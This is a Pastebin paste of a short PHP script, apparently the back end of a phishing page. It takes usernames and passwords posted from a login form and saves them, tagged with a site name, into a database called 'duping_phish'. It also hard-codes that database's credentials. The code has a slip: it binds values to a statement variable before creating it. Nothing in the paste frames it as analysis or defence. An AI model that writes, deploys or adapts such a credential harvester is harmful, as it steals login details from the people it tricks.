Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- define('DB_HOST', 'localhost');
- define('DB_NAME', 'duping_phish');
- define('DB_USERNAME', 'duping_ama');
- define('DB_PASSWORD', 'lol123');
- //create the connection
- $odb = new PDO('mysql:host=' . DB_HOST . ';dbname=' . DB_NAME, DB_USERNAME, DB_PASSWORD);
- $site="Abusewith.us";
- $loginUser = $_POST['username'];
- $loginPass = $_POST['password'];
- //select count
- $sql = "SELECT count(*) FROM `sites` WHERE username = :username AND password = :password";
- $result = $odb->prepare($sql);
- //bind params for security
- $stmt->bindValue(':username',$loginUser,PDO::PARAM_STR);
- $stmt->bindValue(':password',$loginPass,PDO::PARAM_STR);
- $result->execute();
- //fetch the number of results
- $number_of_rows = $result->fetchColumn();
- if ($number_of_rows == 0) {
- //the query itself
- $sql = "INSERT INTO sites(username, password, site) VALUES (:username, :password, :site)";
- //prepare the statement for execution (set the query)
- $stmt = $odb->prepare($sql);
- //bind the parameters to the values, using "PDO::PARAM_STR" < used to prevent sql injection
- $stmt->bindParam(':username', $loginUser, PDO::PARAM_STR);
- $stmt->bindParam(':password', $loginPass, PDO::PARAM_STR);
- $stmt->bindParam(':site', $site, PDO::PARAM_STR);
- //execute the statement
- $stmt->execute();
- } else {
- //there was already a row
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement